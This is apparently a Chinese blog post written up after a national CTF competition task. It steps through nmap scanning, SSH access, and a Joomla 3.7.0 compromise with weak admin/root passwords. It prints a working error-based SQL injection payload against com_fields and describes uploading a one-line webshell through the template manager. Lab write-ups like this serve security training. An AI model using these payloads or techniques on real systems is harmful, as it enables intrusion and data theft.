自我刻度·记录 文章详情

← 返回主页

国赛 CTF b模块

任务8

先通过nmap -sV -T4 IP地址扫描下端口

image

1.     Flag:OpenSSH 5.3 (protocol 2.0)

访问下目标80端口的网页 ,猜拳胜利后得到了密码

image

进行base64  echo MTE0NTE0Cg== | base64 -d

image

image

这里使用putty直接连SSH,然后将这个图片文件放到html下面,设置权限为chmod 777

1.     Open

2.     Flag{OpenSSHbug}

Find / -name “flag1.txt”

Find / -name “flag2.txt”

image

image

6 nmap -sV -T4 IP地址,扫描对应的端口信息。

image

通过joomsacn –url http://192.168.3.52 得到了CMS版本号

image

还有些目录 得到了后台登陆页面

image

账户密码是弱口令 admin admin

image

Searchsploit Joomla 3.7.0 //搜索对应的poc

image

/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))  //报错盲注的知识

image

进入后台的模版管理这里,上传一句话木马文件,然后通过蚁剑连接就行

image

发现SSH服务是弱口令 root  toor  直接连进去

image

技术网络 · 其他文章 (19)